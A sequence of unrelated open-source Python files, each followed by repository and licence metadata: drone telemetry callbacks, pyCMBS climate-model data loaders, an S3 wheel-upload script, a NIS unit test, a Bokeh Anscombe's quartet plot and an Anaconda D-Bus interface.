#print 'Velocity changed to:\n', network.vehicle_params.velocity, ' m/s'
"""
Airspeed and groundspeed are exactly the same in the simulation but
this is not applicable in real-life scenarios.
Tolerance is added to cm scale
Return: speed (m/s)
"""
@vehicle.on_attribute('airspeed')
def decorated_airspeed_callback(self, attr_name, value):
if network.vehicle_params.airspeed == round(value, 2):
pass
else:
network.vehicle_params.airspeed = round(value, 2)
#print 'Airspeed changed to: ', network.vehicle_params.airspeed, ' m/s'
@vehicle.on_attribute('groundspeed')
def decorated_groundspeed_callback(self, attr_name, value):
if network.vehicle_params.groundspeed == round(value, 2):
pass
else:
network.vehicle_params.groundspeed = round(value, 2)
#print 'Groundspeed changed to: ', network.vehicle_params.groundspeed, ' m/s'
#State of EKF
#return: True/False
@vehicle.on_attribute('vehicle.ekf_ok')
def decorated_ekf_ok_callback(self, attr_name, value):
network.vehicle_params.ekf_ok = value
print 'EKF availability changed to: ', network.vehicle_params.ekf_ok
#GPS-related info
#return: .eph (HDOP) .epv (VDOP) .fix_type .satellites_visible
@vehicle.on_attribute('vehicle.gps_0')
def decorated_gps_callback(self, attr_name, value):
network.vehicle_params.gps_fix = value.fix_type
network.vehicle_params.gps_sat = value.satellites_visible
network.vehicle_params.gps_eph = value.eph
network.vehicle_params.gps_epv = value.epv
print 'GPSInfo changed to:\nFix:', network.vehicle_params.gps_fix, \
'\nSatellites:', network.vehicle_params.gps_sat, '\nEPH:', network.vehicle_params.gps_eph, \
'\nEPV: ', network.vehicle_params.gps_epv
#Set altitude offboard
#return: True/False
@vehicle.on_attribute('set_altitude_target_global_int')
def decorated_set_global_altitude_callback(self, attr_name, value):
network.vehicle_params.set_global_alt = value
print 'Ability to set global altitude changed to: ', network.vehicle_params.set_global_alt
#Set attitude offboard
#return: True/False
@vehicle.on_attribute('set_attitude_target')
def decorated_set_attitude_callback(self, attr_name, value):
network.vehicle_params.set_attitude = value
print 'Ability to set attitude changed to: ', network.vehicle_params.set_attitude
#Flying mode
@vehicle.on_attribute('mode')
def decorated_mode_callback(self, attr_name, value):
network.vehicle_params.mode = value.name
print 'Mode changed to: ', network.vehicle_params.mode
"""
A precision of 7 decimal digits in lat/lon degrees is satisfactory.
        Tolerance of 7 decimal digits in degrees equals 11 millimetres
http://gis.stackexchange.com/questions/8650/how-to-measure-the-accuracy-of-latitude-and-longitude
Returns: altitude (metres)
longitude (degrees)
latitude (degrees)
"""
@vehicle.on_attribute('location.global_relative_frame')
def decorated_global_relative_frame_callback(self, attr_name, value):
if network.vehicle_params.global_alt == round(value.alt, 2) and \
network.vehicle_params.global_lat == round(value.lat, 7) and \
network.vehicle_params.global_lon == round(value.lon, 7):
pass
else:
network.vehicle_params.global_alt = round(value.alt, 2)
network.vehicle_params.global_lat = round(value.lat, 7)
network.vehicle_params.global_lon = round(value.lon, 7)
#print 'Location changed to:\nAlt:', network.vehicle_params.global_alt, \
# '\nLat:', network.vehicle_params.global_lat, '\nLon:', network.vehicle_params.global_lon
"""
Drone 360-degree heading, 0 is North.
Added a tolerance of +-1 degree
"""
@vehicle.on_attribute('heading')
def decorated_heading_callback(self, attr_name, value):
if network.vehicle_params.heading == value or \
network.vehicle_params.heading == (value + 1) or \
network.vehicle_params.heading == (value - 1):
pass
else:
network.vehicle_params.heading = value
#print 'Heading changed to: ', network.vehicle_params.heading
#Updates the next waypoint in case of mission
@vehicle.on_message('MISSION_CURRENT')
def message_listener(self, name, message):
try:
if network.vehicle_params.next_wp == message.seq:
return
else:
print 'Next waypoint changed'
network.vehicle_params.next_wp = message.seq
cmd = vehicle.commands
if cmd.count == 0:
print 'No waypoints found'
else:
print 'Waypoint', cmd.next, ' out of ', cmd.count, ':'
pos = cmd.next - 1
print 'Frame, Lat, Lon, Alt:', cmd[pos].frame, cmd[
pos].x, cmd[pos].y, cmd[pos].z
network.vehicle_params.next_wp_lat = cmd[pos].x
network.vehicle_params.next_wp_lon = cmd[pos].y
network.vehicle_params.next_wp_alt = cmd[pos].z
except Exception, e:
print "Error: ", e
def print_all(self):
print "Printing parameter set of drone with ID:", self.ID
print "Version:\t\t\t", self.version
print "Last Received:\t\t\t", self.last_recv
print "EKF_OK:\t\t\t\t", self.ekf_ok
print "GPS fix:\t\t\t", self.gps_fix
print "GPS No. satellites:\t\t", self.gps_sat
print "GPS EPH:\t\t\t", self.gps_eph
print "GPS EPV:\t\t\t", self.gps_epv
print "Global altitude settable:\t", self.set_global_alt
print "Global attitude settable:\t", self.set_attitude
print "Distance from self:\t\t", self.distance_from_self
print "Vehicle mode:\t\t\t", self.mode
print "Global altitude:\t\t", self.global_alt
print "Global latitude:\t\t", self.global_lat
print "Global longitude:\t\t", self.global_lon
print "Mission Importance:\t\t", self._mission_importance
print "Heading (degrees):\t\t", self.heading
print "Next waypoint number:\t\t", self.next_wp
print "Next waypoint latitude:\t\t", self.next_wp_lat
print "Next waypoint longitude:\t", self.next_wp_lon
print "Next waypoint altitude:\t\t", self.next_wp_alt
print "Battery level (%):\t\t", self.battery_level
print "Velocity (airspeed m/s):\t", self.velocity
print "Groundspeed (m/s):\t\t", self.groundspeed
print "Airspeed (m/s):\t\t\t", self.airspeed
print "System status:\t\t\t", self.system_status
print "\n\n"
"""
*EXTREMELY HACKABLE*
Level 0: Default (e.g. for hobbyists, recreation, entertainment)
Level 1: Important (e.g. for businesses, industry-related activity)
Level 2: Top (e.g. for search and rescue, security activity)
    In order to elevate mission privileges, a special request must be made to the appropriate authorities
Currently not supported
"""
@property
def mission_importance(self):
return self._mission_importance
@mission_importance.setter
def mission_importance(self, level):
#Need to add all kinds of security here
self._mission_importance = 0
        if level == 1 or level == 2:
            print "You need to ask permission from authoritative personnel"
#if request_successful: self._mission_importance = level
#else: print "You don't have the rights."
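# Usage sketch for the "dummy" mode described in the module docstring; no vehicle or
# network connection is needed and the values are the hard-coded defaults above:
#
#   params = Params(dummy=True)
#   params.print_all()
#   params.mission_importance = 1   # currently always falls back to level 0, see the setter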
|
LeonNie52/dk-plus
|
test files/params.py
|
Python
|
gpl-3.0
| 13,072 | 0.008415 |
# -*- coding: utf-8 -*-
"""
This file is part of pyCMBS.
(c) 2012- Alexander Loew
For COPYING and LICENSE details, please refer to the LICENSE file
"""
from cdo import Cdo
from pycmbs.data import Data
import tempfile as tempfile
import copy
import glob
import os
import sys
import ast
import numpy as np
from pycmbs.benchmarking import preprocessor
from pycmbs.benchmarking.utils import get_T63_landseamask, get_temporary_directory
from pycmbs.benchmarking.models.model_basic import *
from pycmbs.utils import print_log, WARNING
class CMIP5Data(Model):
"""
Class for CMIP5 model simulations. This class is derived from C{Model}.
"""
def __init__(self, data_dir, model, experiment, dic_variables, name='', shift_lon=False, **kwargs):
"""
Parameters
----------
data_dir : str
directory that specifies the root directory where the data is located
model : TBD todo
experiment : str
specifies the ID of the experiment
dic_variables : TODO
name : str
name of model
shift_lon : bool
specifies if longitudes of data need to be shifted
kwargs : dict
other keyword arguments
"""
if name == '':
name = model
super(CMIP5Data, self).__init__(data_dir, dic_variables, name=name, shift_lon=shift_lon, **kwargs)
self.model = model
self.experiment = experiment
self.data_dir = data_dir
self.shift_lon = shift_lon
self.type = 'CMIP5'
self._unique_name = self._get_unique_name()
def _get_unique_name(self):
"""
get unique name from model and experiment
Returns
-------
string with unique combination of models and experiment
"""
s = self.model.replace(' ', '') + '-' + self.experiment.replace(' ', '')
s = s.replace('#', '-')
if hasattr(self, 'ens_member'):
s += '-' + str(self.ens_member)
return s
def get_rainfall_data(self, interval='season', **kwargs):
return self.get_model_data_generic(interval=interval, **kwargs)
def get_wind(self, interval='season', **kwargs):
return self.get_model_data_generic(interval=interval, **kwargs)
def get_evaporation(self, interval='season', **kwargs):
return self.get_model_data_generic(interval=interval, **kwargs)
def get_latent_heat_flux(self, interval='season', **kwargs):
return self.get_model_data_generic(interval=interval, **kwargs)
def get_model_data_generic(self, interval='season', **kwargs):
"""
unique parameters are:
filename - file basename
variable - name of the variable as the short_name in the netcdf file
kwargs is a dictionary with keys for each model. Then a dictionary with properties follows
"""
if not self.type in kwargs.keys():
print ''
print 'WARNING: it is not possible to get data using generic function, as method missing: ', self.type, kwargs.keys()
assert False
locdict = kwargs[self.type]
# read settings and details from the keyword arguments
        # no defaults; everything should be explicitly specified in either the config file or the dictionaries
varname = locdict.pop('variable', None)
#~ print self.type
#~ print locdict.keys()
assert varname is not None, 'ERROR: provide varname!'
units = locdict.pop('unit', None)
assert units is not None, 'ERROR: provide unit!'
lat_name = locdict.pop('lat_name', 'lat')
lon_name = locdict.pop('lon_name', 'lon')
model_suffix = locdict.pop('model_suffix', None)
model_prefix = locdict.pop('model_prefix', None)
file_format = locdict.pop('file_format')
scf = locdict.pop('scale_factor')
valid_mask = locdict.pop('valid_mask')
custom_path = locdict.pop('custom_path', None)
thelevel = locdict.pop('level', None)
target_grid = self._actplot_options['targetgrid']
interpolation = self._actplot_options['interpolation']
if custom_path is None:
filename1 = self.get_raw_filename(varname, **kwargs) # routine needs to be implemented by each subclass
else:
filename1 = custom_path + self.get_raw_filename(varname, **kwargs)
if filename1 is None:
print_log(WARNING, 'No valid model input data')
return None
force_calc = False
if self.start_time is None:
raise ValueError('Start time needs to be specified')
if self.stop_time is None:
raise ValueError('Stop time needs to be specified')
#/// PREPROCESSING ///
cdo = Cdo()
s_start_time = str(self.start_time)[0:10]
s_stop_time = str(self.stop_time)[0:10]
#1) select timeperiod and generate monthly mean file
if target_grid == 't63grid':
gridtok = 'T63'
else:
gridtok = 'SPECIAL_GRID'
file_monthly = filename1[:-3] + '_' + s_start_time + '_' + s_stop_time + '_' + gridtok + '_monmean.nc' # target filename
file_monthly = get_temporary_directory() + os.path.basename(file_monthly)
sys.stdout.write('\n *** Model file monthly: %s\n' % file_monthly)
if not os.path.exists(filename1):
print 'WARNING: File not existing: ' + filename1
return None
cdo.monmean(options='-f nc', output=file_monthly, input='-' + interpolation + ',' + target_grid + ' -seldate,' + s_start_time + ',' + s_stop_time + ' ' + filename1, force=force_calc)
sys.stdout.write('\n *** Reading model data... \n')
sys.stdout.write(' Interval: ' + interval + '\n')
#2) calculate monthly or seasonal climatology
if interval == 'monthly':
mdata_clim_file = file_monthly[:-3] + '_ymonmean.nc'
mdata_sum_file = file_monthly[:-3] + '_ymonsum.nc'
mdata_N_file = file_monthly[:-3] + '_ymonN.nc'
mdata_clim_std_file = file_monthly[:-3] + '_ymonstd.nc'
cdo.ymonmean(options='-f nc -b 32', output=mdata_clim_file, input=file_monthly, force=force_calc)
cdo.ymonsum(options='-f nc -b 32', output=mdata_sum_file, input=file_monthly, force=force_calc)
cdo.ymonstd(options='-f nc -b 32', output=mdata_clim_std_file, input=file_monthly, force=force_calc)
cdo.div(options='-f nc', output=mdata_N_file, input=mdata_sum_file + ' ' + mdata_clim_file, force=force_calc) # number of samples
elif interval == 'season':
mdata_clim_file = file_monthly[:-3] + '_yseasmean.nc'
mdata_sum_file = file_monthly[:-3] + '_yseassum.nc'
mdata_N_file = file_monthly[:-3] + '_yseasN.nc'
mdata_clim_std_file = file_monthly[:-3] + '_yseasstd.nc'
cdo.yseasmean(options='-f nc -b 32', output=mdata_clim_file, input=file_monthly, force=force_calc)
cdo.yseassum(options='-f nc -b 32', output=mdata_sum_file, input=file_monthly, force=force_calc)
cdo.yseasstd(options='-f nc -b 32', output=mdata_clim_std_file, input=file_monthly, force=force_calc)
cdo.div(options='-f nc -b 32', output=mdata_N_file, input=mdata_sum_file + ' ' + mdata_clim_file, force=force_calc) # number of samples
else:
raise ValueError('Unknown temporal interval. Can not perform preprocessing!')
if not os.path.exists(mdata_clim_file):
return None
#3) read data
if interval == 'monthly':
thetime_cylce = 12
elif interval == 'season':
thetime_cylce = 4
else:
print interval
raise ValueError('Unsupported interval!')
mdata = Data(mdata_clim_file, varname, read=True, label=self._unique_name, unit=units, lat_name=lat_name, lon_name=lon_name, shift_lon=False, scale_factor=scf, level=thelevel, time_cycle=thetime_cylce)
mdata_std = Data(mdata_clim_std_file, varname, read=True, label=self._unique_name + ' std', unit='-', lat_name=lat_name, lon_name=lon_name, shift_lon=False, level=thelevel, time_cycle=thetime_cylce)
mdata.std = mdata_std.data.copy()
del mdata_std
mdata_N = Data(mdata_N_file, varname, read=True, label=self._unique_name + ' std', unit='-', lat_name=lat_name, lon_name=lon_name, shift_lon=False, scale_factor=scf, level=thelevel)
mdata.n = mdata_N.data.copy()
del mdata_N
# ensure that climatology always starts with January, therefore set date and then sort
mdata.adjust_time(year=1700, day=15) # set arbitrary time for climatology
mdata.timsort()
#4) read monthly data
mdata_all = Data(file_monthly, varname, read=True, label=self._unique_name, unit=units, lat_name=lat_name, lon_name=lon_name, shift_lon=False, time_cycle=12, scale_factor=scf, level=thelevel)
mdata_all.adjust_time(day=15)
#mask_antarctica masks everything below 60 degrees S.
#here we only mask Antarctica, if only LAND points shall be used
if valid_mask == 'land':
mask_antarctica = True
elif valid_mask == 'ocean':
mask_antarctica = False
else:
mask_antarctica = False
if target_grid == 't63grid':
mdata._apply_mask(get_T63_landseamask(False, area=valid_mask, mask_antarctica=mask_antarctica))
mdata_all._apply_mask(get_T63_landseamask(False, area=valid_mask, mask_antarctica=mask_antarctica))
else:
tmpmsk = get_generic_landseamask(False, area=valid_mask, target_grid=target_grid, mask_antarctica=mask_antarctica)
mdata._apply_mask(tmpmsk)
mdata_all._apply_mask(tmpmsk)
del tmpmsk
mdata_mean = mdata_all.fldmean()
mdata._raw_filename = filename1
mdata._monthly_filename = file_monthly
mdata._clim_filename = mdata_clim_file
mdata._varname = varname
# return data as a tuple list
retval = (mdata_all.time, mdata_mean, mdata_all)
del mdata_all
return mdata, retval
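    # Sketch of the per-model keyword dictionary consumed by get_model_data_generic();
    # the keys mirror the locdict.pop() calls above, the values are illustrative only:
    #
    #   kwargs = {'CMIP5': {'variable': 'rsds', 'unit': 'W m**-2', 'file_format': 'nc',
    #                       'scale_factor': 1., 'valid_mask': 'land',
    #                       'lat_name': 'lat', 'lon_name': 'lon'}}
    #   mdata, (t, means, monthly) = model.get_model_data_generic(interval='season', **kwargs)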
def get_temperature_2m(self, interval='monthly', **kwargs):
return self.get_model_data_generic(interval=interval, **kwargs)
def get_surface_shortwave_radiation_down(self, interval='monthly', **kwargs):
return self.get_model_data_generic(interval=interval, **kwargs)
def get_surface_shortwave_radiation_up(self, interval='monthly', **kwargs):
return self.get_model_data_generic(interval=interval, **kwargs)
def get_albedo(self, interval='season', dic_up=None, dic_down=None):
"""
        calculate albedo as the ratio of upward and downwelling fluxes;
        first the monthly mean fluxes are used to calculate the albedo.
        As the usage of different variables requires knowledge of the configuration of
        the input streams, these need to be provided in addition.
Parameters
----------
dic_up : dict
dictionary for get_surface_shortwave_radiation_up() as specified in model_data_routines.json
dic_down : dict
dictionary for get_surface_shortwave_radiation_down() as specified in model_data_routines.json
"""
assert dic_up is not None, 'ERROR: dic_up needed'
assert dic_down is not None, 'ERROR: dic_down needed'
force_calc = False
# read land-sea mask
#~ ls_mask = get_T63_landseamask(self.shift_lon)
#~ target grid ??? valid mask ????
def _extract_dict_from_routine_name(k, s):
# extract dictionary name from routine name in model_data_routines.json
res = ast.literal_eval(s[k].split('**')[1].rstrip()[:-1])
#~ print res, type(res)
return res
        # extract configuration dictionaries for fluxes from model_data_routines
kw_up = _extract_dict_from_routine_name('surface_upward_flux', dic_up)
kw_down = _extract_dict_from_routine_name('sis', dic_down)
if self.start_time is None:
raise ValueError('Start time needs to be specified')
if self.stop_time is None:
raise ValueError('Stop time needs to be specified')
# get fluxes
Fu = self.get_surface_shortwave_radiation_up(interval=interval, **kw_up)
if Fu is None:
print 'File not existing for UPWARD flux!: ', self.name
return None
else:
Fu_i = Fu[0]
lab = Fu_i._get_label()
Fd = self.get_surface_shortwave_radiation_down(interval=interval, **kw_down)
if Fd is None:
print 'File not existing for DOWNWARD flux!: ', self.name
return None
else:
Fd_i = Fd[0]
        # albedo for the chosen interval is calculated as the ratio of the means of the fluxes in that interval (e.g. season, months)
Fu_i.div(Fd_i, copy=False)
del Fd_i # Fu contains now the albedo
#~ Fu_i._apply_mask(ls_mask.data)
#albedo for monthly data (needed for global mean plots )
Fu_m = Fu[1][2]
del Fu
Fd_m = Fd[1][2]
del Fd
Fu_m.div(Fd_m, copy=False)
del Fd_m
#~ Fu_m._apply_mask(ls_mask.data)
Fu_m._set_valid_range(0., 1.)
Fu_m.label = lab + ' albedo'
Fu_i.label = lab + ' albedo'
Fu_m.unit = '-'
Fu_i.unit = '-'
# center dates of months
Fu_m.adjust_time(day=15)
Fu_i.adjust_time(day=15)
# return data as a tuple list
retval = (Fu_m.time, Fu_m.fldmean(), Fu_m)
return Fu_i, retval
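    # Sketch of the routine dictionaries expected by get_albedo(); each value is the
    # routine string from model_data_routines.json whose trailing "**{...}" part is
    # parsed by _extract_dict_from_routine_name() (contents illustrative):
    #
    #   dic_up = {'surface_upward_flux':
    #             "get_surface_shortwave_radiation_up(interval=interval, **{'CMIP5': {...}})"}
    #   dic_down = {'sis':
    #               "get_surface_shortwave_radiation_down(interval=interval, **{'CMIP5': {...}})"}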
class CMIP5RAWData(CMIP5Data):
"""
This class is supposed to use CMIP5 data in RAW format.
This means that it builds on the CMORIZED CMIP5 data, but
    performs all necessary preprocessing steps, e.g. the calculation
    of ensemble means
"""
def __init__(self, data_dir, model, experiment, dic_variables, name='', shift_lon=False, **kwargs):
super(CMIP5RAWData, self).__init__(data_dir, model, experiment, dic_variables, name=name, shift_lon=shift_lon, **kwargs)
self.model = model
self.experiment = experiment
self.data_dir = data_dir
self.shift_lon = shift_lon
self.type = 'CMIP5RAW'
self._unique_name = self._get_unique_name()
def get_raw_filename(self, varname, **kwargs):
mip = kwargs[self.type].pop('mip', None)
assert mip is not None, 'ERROR: <mip> needs to be provided (CMIP5RAWSINGLE)'
realm = kwargs[self.type].pop('realm')
assert realm is not None, 'ERROR: <realm> needs to be provided (CMIP5RAWSINGLE)'
return self._get_ensemble_filename(varname, mip, realm)
def _get_ensemble_filename(self, the_variable, mip, realm):
"""
get filename of ensemble mean file
if required, then all pre-processing steps are done
Parameters
----------
the_variable : str
variable name to be processed
Returns
-------
returns filename of file with multi-ensemble means
"""
# use model parser to generate a list of available institutes and
# models from data directory
data_dir = self.data_dir
if data_dir[-1] != os.sep:
data_dir += os.sep
CMP = preprocessor.CMIP5ModelParser(self.data_dir)
model_list = CMP.get_all_models()
# model name in configuration file is assumed to be INSTITUTE:MODEL
institute = self.model.split(':')[0]
model = self.model.split(':')[1]
# TODO why is the institute not in the model output name ???
output_file = get_temporary_directory() + the_variable + '_' + mip + '_' + model + '_' + self.experiment + '_ensmean.nc'
if institute not in model_list.keys():
raise ValueError('Data for this institute is not existing: %s' % institute)
# do preprocessing of data from multiple ensembles if file
# already existing, then no processing is done
C5PP = preprocessor.CMIP5Preprocessor(data_dir, output_file,
the_variable, model,
self.experiment,
institute=institute, mip=mip, realm=realm)
# calculate the ensemble mean and store as file
        # also the STDV is calculated on the fly
# resulting filenames are available by C5PP.outfile_ensmean and C5PP.outfile_ensstd
C5PP.ensemble_mean(delete=False,
start_time=self.start_time,
stop_time=self.stop_time)
return C5PP.outfile_ensmean
class CMIP5RAW_SINGLE(CMIP5RAWData):
"""
This class is supposed to use CMIP5 data in RAW format.
    It is supposed to handle single ensemble members
"""
def __init__(self, data_dir, model, experiment, dic_variables, name='', shift_lon=False, **kwargs):
"""
Parameters
----------
model_type : str
            model type as specified in the configuration file. It is
            supposed to be of the format MPI-M:MPI-ESM-LR#1 etc.,
            where after # there needs to be an integer number specifying
            the ensemble member number
"""
if name == '':
name = model
# split between model type and ensemble member
s = model.split('#')
if len(s) != 2:
print model, s
raise ValueError('ERROR: invalid ensemble member specification')
else:
model = s[0]
self.ens_member = int(s[1])
self.institute = model.split(':')[0]
super(CMIP5RAWData, self).__init__(data_dir, model, experiment, dic_variables, name=name, shift_lon=shift_lon, **kwargs)
self.model = model
self.experiment = experiment
self.data_dir = data_dir
self.shift_lon = shift_lon
self.type = 'CMIP5RAWSINGLE'
self._unique_name = self._get_unique_name()
def get_raw_filename(self, variable, **kwargs):
"""
return RAW filename for class CMIP5RAWSINGLE
"""
# information comes from model_data_routines.json
mip = kwargs[self.type].pop('mip', None)
assert mip is not None, 'ERROR: <mip> needs to be provided (CMIP5RAWSINGLE)'
realm = kwargs[self.type].pop('realm')
assert realm is not None, 'ERROR: <realm> needs to be provided (CMIP5RAWSINGLE)'
temporal_resolution = kwargs[self.type].pop('temporal_resolution')
assert temporal_resolution is not None, 'ERROR: <temporal_resolution> needs to be provided (CMIP5RAWSINGLE)'
data_dir = self.data_dir
if data_dir[-1] != os.sep:
data_dir += os.sep
model = self.model.split(':')[1]
fp = data_dir + self.institute + os.sep + model + os.sep + self.experiment + os.sep + temporal_resolution + os.sep + realm + os.sep + mip + os.sep + 'r' + str(self.ens_member) + 'i1p1' + os.sep + variable + os.sep + variable + '_' + mip + '_' + model + '_' + self.experiment + '_r' + str(self.ens_member) + 'i1p1_*.nc'
files = glob.glob(fp)
if len(files) == 0:
return None
if len(files) != 1:
print files
raise ValueError('More than one file found!')
return files[0]
class CMIP3Data(CMIP5Data):
"""
Class for CMIP3 model simulations. This class is derived from C{Model}.
"""
def __init__(self, data_dir, model, experiment, dic_variables, name='', shift_lon=False, **kwargs):
"""
Parameters
----------
data_dir: directory that specifies the root directory where the data is located
        model: TBD todo
experiment: specifies the ID of the experiment (str)
dic_variables:
name: TBD todo
shift_lon: specifies if longitudes of data need to be shifted
kwargs: other keyword arguments
"""
super(CMIP3Data, self).__init__(data_dir, model, experiment, dic_variables, name=model, shift_lon=shift_lon, **kwargs)
self.model = model
self.experiment = experiment
self.data_dir = data_dir
self.shift_lon = shift_lon
self.type = 'CMIP3'
self._unique_name = self._get_unique_name()
|
pygeo/pycmbs
|
pycmbs/benchmarking/models/cmip5.py
|
Python
|
mit
| 20,505 | 0.003755 |
#!/usr/bin/env python
# ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2013-5, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero Public License for more details.
#
# You should have received a copy of the GNU Affero Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
import os
import sys
import boto
from boto.s3.key import Key
# This script assumes the following environment variables are set for boto:
# - AWS_ACCESS_KEY_ID
# - AWS_SECRET_ACCESS_KEY
REGION = "us-west-2"
BUCKET = "artifacts.numenta.org"
RELEASE_FOLDER = "numenta/nupic.core/releases/nupic.bindings"
def upload(artifactsBucket, wheelFileName, wheelPath):
key = Key(artifactsBucket)
key.key = "%s/%s" % (RELEASE_FOLDER, wheelFileName)
print "Uploading %s to %s/%s..." % (wheelFileName, BUCKET, RELEASE_FOLDER)
key.set_contents_from_filename(wheelPath)
def run(wheelPath):
wheelFileName = os.path.basename(wheelPath)
conn = boto.connect_s3()
artifactsBucket = conn.get_bucket(BUCKET)
upload(artifactsBucket, wheelFileName, wheelPath)
if __name__ == "__main__":
wheelPath = sys.argv[1]
run(wheelPath)
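# Usage sketch (the wheel filename is made up; the AWS credentials listed at the top of
# this file must be set in the environment):
#
#   python ci/travis/deploy-wheel-to-s3.py dist/nupic.bindings-0.4.5-cp27-none-linux_x86_64.whl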
|
metaml/nupic.core
|
ci/travis/deploy-wheel-to-s3.py
|
Python
|
agpl-3.0
| 1,831 | 0.0071 |
from test import test_support
import unittest
nis = test_support.import_module('nis')
class NisTests(unittest.TestCase):
def test_maps(self):
try:
maps = nis.maps()
except nis.error, msg:
# NIS is probably not active, so this test isn't useful
self.skipTest(str(msg))
try:
# On some systems, this map is only accessible to the
# super user
maps.remove("passwd.adjunct.byname")
except ValueError:
pass
done = 0
for nismap in maps:
mapping = nis.cat(nismap)
for k, v in mapping.items():
if not k:
continue
if nis.match(k, nismap) != v:
self.fail("NIS match failed for key `%s' in map `%s'" % (k, nismap))
else:
# just test the one key, otherwise this test could take a
# very long time
done = 1
break
if done:
break
def test_main():
test_support.run_unittest(NisTests)
if __name__ == '__main__':
test_main()
|
j5shi/Thruster
|
pylibs/test/test_nis.py
|
Python
|
gpl-2.0
| 1,215 | 0.003292 |
from __future__ import print_function
import numpy as np
import pandas as pd
from bokeh.browserlib import view
from bokeh.document import Document
from bokeh.embed import file_html
from bokeh.glyphs import Circle, Line
from bokeh.objects import (
ColumnDataSource, Glyph, Grid, GridPlot, LinearAxis, Plot, Range1d
)
from bokeh.resources import INLINE
raw_columns=[
[10.0, 8.04, 10.0, 9.14, 10.0, 7.46, 8.0, 6.58],
[8.0, 6.95, 8.0, 8.14, 8.0, 6.77, 8.0, 5.76],
[13.0, 7.58, 13.0, 8.74, 13.0, 12.74, 8.0, 7.71],
[9.0, 8.81, 9.0, 8.77, 9.0, 7.11, 8.0, 8.84],
[11.0, 8.33, 11.0, 9.26, 11.0, 7.81, 8.0, 8.47],
[14.0, 9.96, 14.0, 8.10, 14.0, 8.84, 8.0, 7.04],
[6.0, 7.24, 6.0, 6.13, 6.0, 6.08, 8.0, 5.25],
[4.0, 4.26, 4.0, 3.10, 4.0, 5.39, 19.0, 12.5],
[12.0, 10.84, 12.0, 9.13, 12.0, 8.15, 8.0, 5.56],
[7.0, 4.82, 7.0, 7.26, 7.0, 6.42, 8.0, 7.91],
[5.0, 5.68, 5.0, 4.74, 5.0, 5.73, 8.0, 6.89]]
quartet = pd.DataFrame(data=raw_columns, columns=
['Ix','Iy','IIx','IIy','IIIx','IIIy','IVx','IVy'])
circles_source = ColumnDataSource(
data = dict(
xi = quartet['Ix'],
yi = quartet['Iy'],
xii = quartet['IIx'],
yii = quartet['IIy'],
xiii = quartet['IIIx'],
yiii = quartet['IIIy'],
xiv = quartet['IVx'],
yiv = quartet['IVy'],
)
)
x = np.linspace(-0.5, 20.5, 10)
y = 3 + 0.5 * x
lines_source = ColumnDataSource(data=dict(x=x, y=y))
xdr = Range1d(start=-0.5, end=20.5)
ydr = Range1d(start=-0.5, end=20.5)
def make_plot(title, xname, yname):
plot = Plot(
x_range=xdr, y_range=ydr, data_sources=[lines_source, circles_source],
title=title, plot_width=400, plot_height=400, border_fill='white', background_fill='#e9e0db')
xaxis = LinearAxis(plot=plot, dimension=0, location="bottom", axis_line_color=None)
yaxis = LinearAxis(plot=plot, dimension=1, location="left", axis_line_color=None)
xgrid = Grid(plot=plot, dimension=0, axis=xaxis)
ygrid = Grid(plot=plot, dimension=1, axis=yaxis)
line_renderer = Glyph(
data_source = lines_source,
xdata_range = xdr,
ydata_range = ydr,
glyph = Line(x='x', y='y', line_color="#666699", line_width=2),
)
plot.renderers.append(line_renderer)
circle_renderer = Glyph(
data_source = circles_source,
xdata_range = xdr,
ydata_range = ydr,
glyph = Circle(x=xname, y=yname, size=12, fill_color="#cc6633",
line_color="#cc6633", fill_alpha=0.5),
)
plot.renderers.append(circle_renderer)
return plot
# build the four panels of the quartet
I = make_plot('I', 'xi', 'yi')
II = make_plot('II', 'xii', 'yii')
III = make_plot('III', 'xiii', 'yiii')
IV = make_plot('IV', 'xiv', 'yiv')
grid = GridPlot(children=[[I, II], [III, IV]], plot_width=800)
doc = Document( )
doc.add(grid)
if __name__ == "__main__":
filename = "anscombe.html"
with open(filename, "w") as f:
f.write(file_html(doc, INLINE, "Anscombe's Quartet"))
print("Wrote %s" % filename)
view(filename)
|
the13fools/Bokeh_Examples
|
glyphs/anscombe.py
|
Python
|
bsd-3-clause
| 3,251 | 0.021839 |
#
# Base object of all payload sources.
#
# Copyright (C) 2019 Red Hat, Inc.
#
# This copyrighted material is made available to anyone wishing to use,
# modify, copy, or redistribute it subject to the terms and conditions of
# the GNU General Public License v.2, or (at your option) any later version.
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY expressed or implied, including the implied warranties of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details. You should have received a copy of the
# GNU General Public License along with this program; if not, write to the
# Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA. Any Red Hat trademarks that are incorporated in the
# source code or documentation are not subject to the GNU General Public
# License and may only be used or replicated with the express permission of
# Red Hat, Inc.
#
from abc import ABCMeta
from dasbus.server.interface import dbus_interface
from dasbus.typing import * # pylint: disable=wildcard-import
from pyanaconda.modules.common.base.base_template import ModuleInterfaceTemplate
from pyanaconda.modules.common.constants.interfaces import PAYLOAD_SOURCE
@dbus_interface(PAYLOAD_SOURCE.interface_name)
class PayloadSourceBaseInterface(ModuleInterfaceTemplate, metaclass=ABCMeta):
"""Base class for all the payload source module interfaces.
    This object contains the API shared by all sources. Everything in this
    object has to be implemented by a source for it to be usable.
"""
@property
def Type(self) -> Str:
"""Get the type of this source.
Possible values are:
- LIVE_OS_IMAGE
"""
return self.implementation.type.value
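# Illustrative sketch (not part of the original file): a concrete source module
# would publish its own interface by subclassing the base above, roughly as
# below.  The decorator constant and class name here are hypothetical.
#
#     @dbus_interface(PAYLOAD_SOURCE_LIVE_OS_IMAGE.interface_name)
#     class LiveOSImageSourceInterface(PayloadSourceBaseInterface):
#         """DBus interface for a Live OS image payload source."""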
|
atodorov/anaconda
|
pyanaconda/modules/payloads/source/source_base_interface.py
|
Python
|
gpl-2.0
| 1,817 | 0.001101 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
